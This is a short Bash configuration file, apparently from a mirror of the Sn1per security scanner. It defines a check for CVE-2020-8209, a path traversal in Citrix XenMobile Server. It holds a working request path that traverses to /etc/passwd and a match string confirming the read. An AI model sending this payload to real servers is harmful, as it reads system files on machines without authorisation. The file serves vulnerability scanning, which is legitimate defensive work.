mirror of https://github.com/1N3/Sn1per.git
9 lines
283 B
Bash
9 lines
283 B
Bash
AUTHOR='@xer0dayz'
|
|
VULN_NAME='CVE-2020-8209 - Citrix XenMobile Server Path Traversal'
|
|
URI="/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"
|
|
METHOD='GET'
|
|
MATCH="root:*:"
|
|
SEVERITY='P2 - HIGH'
|
|
CURL_OPTS="--user-agent '' -s -L --insecure"
|
|
SECONDARY_COMMANDS=''
|
|
GREP_OPTIONS='-i' |